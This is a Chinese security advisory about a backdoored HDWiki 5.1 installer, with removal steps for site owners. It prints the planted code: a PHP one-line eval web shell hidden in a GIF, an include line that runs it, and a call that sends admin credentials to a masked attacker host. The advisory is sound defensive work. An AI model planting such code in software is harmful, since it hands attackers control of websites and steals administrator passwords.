近日，知道創(chuàng)宇旗下SCANV網(wǎng)站安全中心研究人員發(fā)現(xiàn)HDWiki百科建站系統(tǒng)(kaiyuan.hudong.com)“HDWiki5.1正式版”被“駭客”人為植入惡意網(wǎng)站木馬(后門(mén))代碼。

該代碼在站長(zhǎng)用戶下載安裝HDWiki程序后，可以記錄并發(fā)送管理員密碼到“駭客”控制的服務(wù)器上，并通過(guò)該惡意代碼直接控制該站長(zhǎng)用戶的網(wǎng)站系統(tǒng)，實(shí)現(xiàn)“脫庫(kù)”、“掛馬”及“非法SEO”等攻擊。

后門(mén)文件分析

經(jīng)過(guò)SCANV網(wǎng)站安全中心研究人員分析，“駭客”在HDWiki安裝文件包里，對(duì)三個(gè)文件進(jìn)行篡改，來(lái)實(shí)現(xiàn)“遠(yuǎn)程執(zhí)行惡意命令，記錄管理員帳號(hào)密碼”的目的。這3個(gè)文件為：

/api/uc_client/control/mail.php

/style/default/admin/open.gif

/control/admin_main.php

1、遠(yuǎn)程執(zhí)行惡意命令

通過(guò)前兩個(gè)文件的篡改，駭客可獲得“遠(yuǎn)程執(zhí)行惡意命令“權(quán)限，可以直接導(dǎo)致攻擊者控制網(wǎng)站系統(tǒng)。其中/style/default/admin/open.gif被植入代碼：

<?php@eval($_POST[馬賽克])?>

這是“駭客”經(jīng)常使用到的一句話網(wǎng)站木馬代碼，惡意代碼是放在gif圖片內(nèi)，直接訪問(wèn)無(wú)法解析為PHP代碼執(zhí)行，然后“駭客”通過(guò)篡改/api/uc_client/control/mail.php文件的第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

包含了這個(gè)含有后門(mén)代碼的圖片，這就使圖片中的代碼得以執(zhí)行。

2、記錄管理員帳號(hào)密碼

“駭客”通過(guò)篡改文件3來(lái)實(shí)現(xiàn)“記錄管理員帳號(hào)密碼”的目的，被植入代碼位于/control/admin_main.php文件的第70行，代碼如下：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

實(shí)現(xiàn)把用戶提交的username以及password截獲等信息并發(fā)送到一個(gè)被“駭客”控制遠(yuǎn)程的服務(wù)器。

知道創(chuàng)宇在第一時(shí)間通知了HDWiki官方，但截至到本文發(fā)布為止，官方?jīng)]有做出任何積極回應(yīng)及防御措施。

知道創(chuàng)宇安全研究團(tuán)隊(duì)強(qiáng)烈建議站長(zhǎng)朋友，在官方清理惡意代碼之前，暫停下載安裝HDWiki百科建站系統(tǒng)。

對(duì)于已經(jīng)安裝的站長(zhǎng)朋友，

知道創(chuàng)宇已經(jīng)緊急推出了診斷工具(http://www.scanv.com/tools/)進(jìn)行網(wǎng)站體檢，確保網(wǎng)站安全。詳細(xì)分析及解決方案見(jiàn)下：

第一步：通過(guò)SCANV網(wǎng)站安全中心后門(mén)檢測(cè)工具：http://www.scanv.com/tools/進(jìn)行確認(rèn)是否受該后門(mén)影響。

第二步：手動(dòng)清除惡意代碼

[1]將/api/uc_client/control/mail.php文件里刪除第9行代碼：

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

復(fù)制代碼

[2]通過(guò)復(fù)制文件/style/default/open.gif覆蓋/style/default/admin/open.gif

[3]將/control/admin_main.php文件里的刪除第70行代碼：

@file_get_contents('http://www.馬賽克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].

'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

第三步：再次通過(guò)SCANV網(wǎng)站安全中心后門(mén)檢測(cè)工具：http://www.scanv.com/tools/體檢確認(rèn)。

第四步：登陸網(wǎng)站后臺(tái)，修改管理員密碼。

[注：請(qǐng)務(wù)必修改管理員密碼，另外處于安全考慮，我們把“駭客”使用的代碼部分用“馬賽克”字樣替換了，請(qǐng)修改代碼的時(shí)候注意一下。]

關(guān)于SCANV網(wǎng)站安全中心及知道創(chuàng)宇

“SCANV網(wǎng)站安全中心”由知道創(chuàng)宇安全研究團(tuán)隊(duì)驅(qū)動(dòng),專注網(wǎng)站安全一體化解決方案,給站長(zhǎng)朋友們提供網(wǎng)站漏洞診斷、漏洞預(yù)警、被黑預(yù)警,并提供多維度的安全解決方案、專家一對(duì)一漏洞修復(fù)、一鍵云端防御等。

“知道創(chuàng)宇”全稱為北京知道創(chuàng)宇信息技術(shù)有限公司。是國(guó)內(nèi)最早提出網(wǎng)站安全云監(jiān)測(cè)及云防御的高新企業(yè),始終致力于為客戶提供基于云技術(shù)支撐的下一代Web安全解決方案。知道創(chuàng)宇總部設(shè)在北京,在香港、上海、廣州、成都設(shè)有分公司,客戶及合作伙伴來(lái)自中國(guó)、美國(guó)、日本、韓國(guó)等。